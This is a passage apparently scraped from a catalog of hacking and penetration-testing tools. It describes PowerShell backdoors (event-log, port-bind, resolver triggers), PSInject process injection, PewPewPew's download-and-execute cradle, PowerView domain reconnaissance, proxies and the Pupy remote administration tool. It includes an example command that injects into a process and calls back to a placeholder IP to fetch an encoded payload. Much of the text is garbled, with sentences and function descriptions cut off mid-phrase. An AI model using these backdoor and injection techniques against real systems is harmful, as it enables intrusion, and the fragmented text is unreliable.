and is not a silver bullet when it comes to cover
communications.
Helper Functions:
Add-PSFirewallRules - Adds powershell to the firewall on
65K ports. Required Admin
Invoke-CallbackIEX - The location for the various
callback mechanisms. Calls back and executes encoded
payload.
Backdoors Available:
Invoke-EventLogBackdoor: Monitors for failed RDP login
attempts. Admin-Yes, Firewall-No, Auditing Reqd
Invoke-PortBindBackdoor: Binds to TCP Port. Admin-No,
Firewall-Yes
Invoke-ResolverBackdoor: Resolves name to decide when to
callback. Admin-No, Firewall-No
Invoke-PortKnockBackdoor: Starts sniffer looking for
PowerPick
This project focuses on allowing the execution of Powershell
functionality without the use of Powershell.exe. Primarily this
project uses.NET assemblies/libraries to start execution of the
Powershell scripts.
Many thanks to those in the offensive powershell community.
This work is not ground breaking but hopefully will motivate
offense and defense to understand the implications and lack of
protections available.
PSInject.ps1
the callback URL that is hard coded into the DLL. See this
script for more details.
The script that it calls back for must be base64 encoded. To do
this, you can simply use the built in linux utility 'base64'.
Example:
import-module psinject.ps1
Invoke-PSInject -Verbose -ProcID 0000 -CBURL http://
1.1.1.1/favicon.ico
ReflectivePick
PewPewPew
This repo contains scripts that utilize a common pattern to host
a script on a PowerShell webserver, invoke the IEX download
cradle to download/execute the target code and post the results
back to the server, and then post-process any results.
More details here
PowerView
PowerView is a PowerShell tool to gain network situational
awareness on Windows domains. It contains a set of purePowerShell replacements for various windows "net *"
commands, which utilize PowerShell AD hooks and underlying
Win32 API functions to perform useful Windows domain
functionality.
It also impements various useful metafunctions, including some
custom-written user-hunting functions which will identify where
on the network specific users are logged into. It can also check
Misc Functions:
Export-PowerViewCSV
thread-safe CSV
append
Set-MacAttribute
resolves a hostname
tests connectivity to
converts a given
to an IP
Test-Server
a specified server
Convert-NameToSid
Convert-SidToName
converts a security
converts a user/group
enumerates local
proxy settings
Get-PathAcl
returns all
returns all
search a local or
adds an ACL to a
enumerate -1000+
net * Functions:
Get-NetDomain
adds a local or
domain user
Get-NetComputer
current servers in the domain
Get-NetPrinter
gets registered
organization units
Get-NetSite
a domain
Get-NetSubnet
subnets for a domain
Get-NetGroup
current groups in a domain
Get-NetGroupMember
adds a local or
gets share
GPO functions
Get-GptTmpl
parses a GptTmpl.inf
to a custom object
Get-NetGPO
for a given domain
Get-NetGPOGroup
takes a user/group
domain or DC policy
User-Hunting Functions:
Invoke-UserHunter
try to build a
MetaFunctions:
Invoke-ShareFinder
finds (non-standard)
finds potentially
Find-UserField
searches a computer
enumerates members of
Download PowerTools
PROGUARD - JAVA CLASS FILE SHRINKER, OPTIMIZER,
OBFUSCATOR AND PREVERIFIER
WHAT IS SHRINKING?
DownloadProGuard
PROJECT ARTILLERY - FULL SUITE FOR PROTECTION
AGAINST ATTACK ON LINUX AND WINDOWS
For those technical folks you can find all of the code in the
following structure:
src/core.py - main central code reuse for things shared
between each module
src/monitor.py - main monitoring module for changes to
the filesystem
brute forcing
Supported platforms
Linux
Windows
DownloadProject Artillery
PROXENET - HACKER FRIENDLY PROXY FOR WEB
APPLICATION PENETRATION TESTS
this is what you are looking for, here are a few links for you:
ZAP
Burp
ProxyStrike
Or the best way, write your own GUI as a proxenet plugin!
Why ?
SSL
Full SSL interception (internal CA)
SSL client certificate authentication
IPv4/IPv6
HTTP Proxy forwarding
White-list/Black-list hosts filtering
Command interface out-of-band
Nice TTY colors :D
100% Open-Source
... and more !
The best of both world ?
DownloadProxenet
PROXYDROID - SET PROXYS (HTTP / SOCKS4 / SOCKS5)
ON YOUR ANDROID DEVICES
ProxyDroid is an app that can help you to set the proxy (http /
socks4 / socks5) on your android devices.
FEATURES
1.
2.
3.
4.
5.
DowbloadProxyDroid
PUPY - MULTI-PLATFORM REMOTE ADMINISTRATION
TOOL
Pupy is an opensource, multi-platform Remote Administration
Tool written in Python. On Windows, Pupy uses reflective dll
injection and leaves no traces on disk.
Features :